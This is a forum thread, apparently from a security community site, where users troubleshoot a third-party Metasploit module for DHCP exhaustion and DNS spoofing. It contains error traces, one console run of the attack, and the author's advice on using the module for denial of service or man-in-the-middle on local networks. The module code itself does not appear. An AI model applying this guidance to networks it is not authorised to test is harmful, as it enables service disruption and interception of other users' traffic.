Jump to content

Metasploit Dns And Dhcp Exhaustion


digininja

Recommended Posts

  • Replies 63
  • Created
  • Last Reply

Top Posters In This Topic

Weird, why didn't my last post show up when I searched a minute ago, oh well, you got the post twice!

It isn't likely to be hitting the Metasploit SVN any time soon due to license issues with the dhcp module I used, GPLv3 is incompatible with BSD

Link to comment
Share on other sites

[*] WARNING! The following modules could not be loaded!

/pentest/exploits/framework3/modules/auxiliary/digininja/dhcp_exhaustion

/exhaust.rb: /pentest/exploits/framework3/modules/auxiliary/digininja/dhcp_exhau

stion/exhaust.rb: MissingSourceFile /usr/lib/ruby/1.8/rubygems/custom_require.rb

:27:in `gem_original_require': no such file to load -- lib/dhcp

o 8 o o

8 8 8

ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P

8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8

8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8

8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8

..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:

::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ metasploit v3.4.0-dev [core:3.4 api:1.0]

+ -- --=[ 550 exploits - 263 auxiliary

+ -- --=[ 208 payloads - 23 encoders - 8 nops

=[ svn r9286 updated today (2010.05.11)

Link to comment
Share on other sites

  • 3 weeks later...

Hi - I have been using/testing your dhcp exploit and was running into a snag that I hope you could help with. At the end of the module exhausting the ip addresses I never get a timeout/you win message. Am I missing something in the configuration?

As extra info I am running this module in BT4 and tested this against a win2k3 server and a linux server with the same results. All three operating systems are within a vmware environment.

Link to comment
Share on other sites

I'm having some problems, could you help me please ?

[*] The Pcaprub module is not available: no such file to load -- pcaprub
[*] Error: Pcaprub not available
(eval):185:in `run'
/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:93:in `job_run_proc'
/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:73:in `run_simple'
/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:82:in `run_simple'
/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/auxiliary.rb:143:in `cmd_run'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:239:in `send'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:239:in `run_command'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:201:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:195:in `each'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:195:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:144:in `run'
./msfconsole:92

I use ubuntu 10.04, with fluxbox. I don't know why this keep doing errors.

Link to comment
Share on other sites

I've just had a dig through the DHCP library I'm using and it looks like all it is is that your DHCP server is sending a field type it doesn't know about.

The DHCP server can send all sorts of information on top of the IP address such as NTP server and things like that. These all have an id. 66 is one that the library doesn't understand. This isn't a problem and won't affect anything.

If you want to hide these messages then add

$DHCP_UNKNOWN => Option,

to line 565 of lib/dhcp/dhcp/options.rb

and

$DHCP_UNKNOWN= 0x66

to line 140 of constants.rb in same directory

I can't test it but that should fix it. If not try changing the 0x66 to just 66.

Link to comment
Share on other sites

For DHCP it depends on what attack you are performing. If all you want to do is a denial of service then you don't need your own server, if you want to man-in-the-middle then yes, set up your own.

dhcpd is a good package, the config file is fairly simple to create.

For DNS you just point it at any existing DNS server, the original one is best, then just replace any requests you want with your own.

Link to comment
Share on other sites

men, something is not right, i try to attack and it is not working..

msf auxiliary(exhaust) > run

[*] DHCP attack started

[*] Timeout waiting for OFFER

[*] Got a timeout, assuming DHCP exhausted. You Win

[*] Finished

[*] Auxiliary module execution completed

Is this normal ? i'm not using eth0, i'm using wi-fi

Link to comment
Share on other sites

men, something is not right, i try to attack and it is not working..

msf auxiliary(exhaust) > run

[*] DHCP attack started

[*] Timeout waiting for OFFER

[*] Got a timeout, assuming DHCP exhausted. You Win

[*] Finished

[*] Auxiliary module execution completed

Is this normal ? i'm not using eth0, i'm using wi-fi

Simple question, are there any DHCP leases left on your DHCP server? If there aren't then there is something wrong.

Link to comment
Share on other sites

@c0cac00l..

Are you sure that you are hitting the DHCP server and not a random address..

Use "Show Options" to check what its directed to by default (255.255.255.255)

To find out ur DHCP server.. whip open a command prompt.. do an IPCONFG.. and its your Subnet Mask .. Mines (255.255.255.0)

Or in linux... google it ;)

The peerhost (or whatever it was called at the time) is gone, it was only there as a hang over from the module that mine is inherited from. Grab the latest version from my site if you are still on an old version.

Your DHCP server is not your subnet mask. Your subnet mask defines the range of your network IP. On most home networks the DHCP server is the modem/router on corporate networks it could be a router, a domain controller or any other machine given the task.

Link to comment
Share on other sites

To find out ur DHCP server.. whip open a command prompt.. do an IPCONFG.. and its your Subnet Mask .. Mines (255.255.255.0)

What? Your subnet mask is your subnet mask, not your DHCP server. All your subnet mask does is essentially tell you the maximum amount of host IPs possible on your specific network.

ie;

255.255.255.0 (/24) tells me that a maximum of 254 host IPs are possible on your network.

That does not, however, mean that there is a minimum of 254 host IP addresses usable by the DHCP pool on your /24 network. The DHCP server determines your IP pool range in it's config file (Usually).

Link to comment
Share on other sites

  • 1 month later...

DCHP requests don't go across subnets so won't go through a router. If you just have a modem connecting your PC to the ISP network then you would be on the same subnet (The modem has to be to get its DHCP address) so you could try the attack however I expect in most cases it would fail as the ISP ties access to its network down to MAC addresses and the fake MAC addresses created by the app won't be allowed on so it won't work.

Link to comment
Share on other sites

  • 4 months later...
  • 3 months later...

Wow this thread seems to be long enough, but I thought this might be the best place for this question. I'm trying to figure out how to run the DHCP Exhaustion module over my wireless card. When the module is loaded and wlan0 is associated with no current DHCP lease, I get "Error: The host (255.255.255.255:67) was unreachable". After I obtain a lease, the module seems to hang indefinitely and nothing appears to happen (no output is displayed). I figured that this was because my card was not running in promiscuous mode, and can't hear any responses assigned to other MAC addresses, but it seems like it should still time out. Anyway, I tried putting my card in monitor mode, but then I get "Error: wlan0 has no ipv4 address". Oddly enough, after running in that configuration, backtrack (4r2) seems to crash. I can't switch to another terminal and I get no response from key strokes (except alt-ctrl-del). I've also tried running the card in managed mode but I get the same error about 255.255.255.255 being unreachable.

I'm using an Acer Aspire One Netbook with an Atheros AR5001 Wireless Network Adapter (rev 01)

Aircrack reports injection works just fine, in case that's an issue.

Any help would be much appreciated.

Link to comment
Share on other sites

There is a difference between monitor mode and promiscuous mode, you need promiscuous mode for this to work. Iron Geek did some research on wifi cards that would do promiscuous mode about 6 months ago if you need a list of which can do it.

Link to comment
Share on other sites

Ahh, many thanks! I was operating under the assumption that monitor mode was the equivalent of promiscuous for wireless cards. This was because while "ifconfig wlan0 -promisc" didn't return an error, it also didn't add any new status to wlan0 when listing the interface with plain ol' "ifconfig". Looks like I'm going to see if there is an updated driver or go shopping for a usb card. Thanks again for clearing up that road block.

Link to comment
Share on other sites

  • 3 months later...

mmh i'm still kinda stuck after reading this thread :/

this warning keeps popping up after i fire up my msfconsole

[-] WARNING! The following modules could not be loaded!
[-] 	/opt/framework-3.7.1/msf3/modules/auxiliary/digininja/dhcp_exhaustion/exhaust.rb: MissingSourceFile no such file to load -- lib/dhcp

yes i'm using the latest ruby build and the latest metasploit (v3.8.0-dev)

and yes i extracted in the right folders

sudo tar -C /opt/framework-3.7.1/msf3/ -xf msf_dhcp_dns_1.0.tar.bz2

could anyone please assist me with this problem?

Link to comment
Share on other sites

  • 4 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...